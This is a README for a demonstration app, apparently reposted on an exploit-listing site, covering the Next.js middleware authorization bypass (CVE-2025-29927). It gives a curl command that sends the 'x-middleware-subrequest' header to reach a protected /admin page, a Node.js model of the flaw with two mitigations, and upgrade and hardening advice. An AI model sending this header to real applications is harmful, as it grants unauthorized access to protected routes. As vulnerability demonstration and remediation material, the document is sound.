## https://sploitus.com/exploit?id=671E7E6C-C3B3-59FA-B57B-9008377B0E54
# Next.js Authorization Bypass Demo

This application demonstrates the `x-middleware-subrequest` header vulnerability (CVE-2025-29927) in Next.js 13.4.19: an unauthenticated client can send a header that Next.js reserves for its own internal sub-requests, and the framework then skips the middleware entirely, so any protection that lives only in middleware is bypassed.

## Setup

1. Install dependencies:
```bash
npm install
```

2. Start the development server:
```bash
npm run dev
```

## Vulnerability Demonstration

The application has an admin page at `/admin` that is protected only by middleware, which redirects requests without a session to `/login`. However, the page can be reached without authenticating by sending the `x-middleware-subrequest` header: Next.js uses that header to stop middleware from recursing into itself, and it does not check that the header came from the framework rather than from the client.

### Normal Flow
1. Visit `/admin` - You will be redirected to `/login`
2. Log in with any credentials - You will be redirected to `/admin`

### Bypass Method
To bypass the authentication, use curl or any HTTP client to send the `x-middleware-subrequest` header. The value must match the name Next.js records for the middleware file: `middleware` when `middleware.ts` sits at the project root (as in this demo), `src/middleware` when it lives under `src/`:

```bash
# -i shows the status line: a 200 with the admin page instead of a 307 to /login
curl -i -H "x-middleware-subrequest: middleware" http://localhost:3000/admin
```
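The following is an added example, not code from this demo repository or from Next.js: a plain Node.js model of the flow above, showing why the header makes the framework skip the middleware, and the two mitigations a practitioner would apply while the upgrade is pending. The dispatch logic is a simplified reconstruction of the pre-patch framework behaviour (an assumption, not the real Next.js source), the protected prefix `/admin` and the `session` cookie name are assumed, and requests are plain object literals so the file runs offline with `node`.

```javascript
// Added example (not the demo's or Next.js's own code). Models the middleware
// bypass and two mitigations with plain objects so it runs offline under node.

// Build a constructed request. Header names are expected lower-case, as Node's
// http module presents them; cookies are already parsed into an object.
function makeRequest(path, { headers = {}, cookies = {} } = {}) {
  return { path, headers: { ...headers }, cookies: { ...cookies } };
}

// The demo's middleware as a plain function. Assumed: /admin is protected and a
// "session" cookie marks a logged-in user. null means "let it through"
// (NextResponse.next()); an object is the redirect response.
function middleware(req) {
  if (req.path.startsWith('/admin') && !req.cookies.session) {
    return { status: 307, headers: { location: '/login' } };
  }
  return null;
}

// The page middleware was supposed to guard; it trusts middleware completely.
function adminPage() {
  return { status: 200, body: 'admin dashboard' };
}

// Same page with authorization enforced locally (defence in depth).
function adminPageHardened(req) {
  if (!req.cookies.session) return { status: 401, body: 'unauthorized' };
  return adminPage();
}

// Name the framework records for the middleware file (assumed root-level
// middleware.ts). It becomes 'src/middleware' when the file lives under src/,
// and the header value has to match it for the skip to trigger.
const MIDDLEWARE_NAME = 'middleware';

// Model of the vulnerable dispatch (simplified reconstruction, assumption).
// The header was meant to stop middleware re-invoking itself on its own
// sub-requests: if the colon-separated list already names this middleware,
// run the page directly. Nothing distinguishes an external client that sends
// the same header, so the attacker's request skips middleware as well.
function dispatch(req, page) {
  const subrequests = (req.headers['x-middleware-subrequest'] || '').split(':');
  if (!subrequests.includes(MIDDLEWARE_NAME)) {
    const blocked = middleware(req);
    if (blocked) return blocked;
  }
  return page(req);
}

// Vulnerable configuration: middleware is the only authorization check.
function dispatchVulnerable(req) {
  return dispatch(req, adminPage);
}

// Mitigation 1: drop the header before it reaches the framework, which is what
// a reverse proxy or WAF in front of an unpatched app should do.
function dispatchWithHeaderStripped(req) {
  const { 'x-middleware-subrequest': _dropped, ...headers } = req.headers;
  return dispatch({ ...req, headers }, adminPage);
}

// Mitigation 2: the route authorizes on its own, so skipping middleware
// gains the attacker nothing.
function dispatchDefenseInDepth(req) {
  return dispatch(req, adminPageHardened);
}

// Stand-alone run: replay the README's curl against each dispatcher.
if (typeof require !== 'undefined' && require.main === module) {
  const bypass = makeRequest('/admin', {
    headers: { 'x-middleware-subrequest': 'middleware' },
  });
  for (const fn of [dispatchVulnerable, dispatchWithHeaderStripped, dispatchDefenseInDepth]) {
    console.log(fn.name, '->', fn(bypass).status);
  }
}
```

Running it prints 200 for the vulnerable dispatcher and 307 / 401 for the two mitigated ones. Header stripping works only if the proxy is the sole path to the app (a client that can reach `next start` directly still bypasses), which is why the route-level check is the one to keep even after upgrading.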

## Security Implications

This demo shows that in Next.js 13.4.19 a single request header is enough to skip middleware altogether. The bypass does not depend on how the middleware checks the session: whatever the middleware does (authentication, authorization, redirects, added security headers) is simply not executed for the attacker's request. In a production environment where middleware is the only guard on protected routes, this gives an unauthenticated user direct access to them.

## Fix

Upgrade to a patched release: 13.5.9 for the 13.x line (the fix also ships in 14.2.25, 15.2.3 and 12.3.5 for the other maintained lines). If you cannot upgrade immediately, drop the `x-middleware-subrequest` header at the reverse proxy or WAF in front of the app so that externally supplied values never reach Next.js. In either case, do not rely on middleware as the sole authorization check: verify the session again in the route handler or server component that renders the protected data.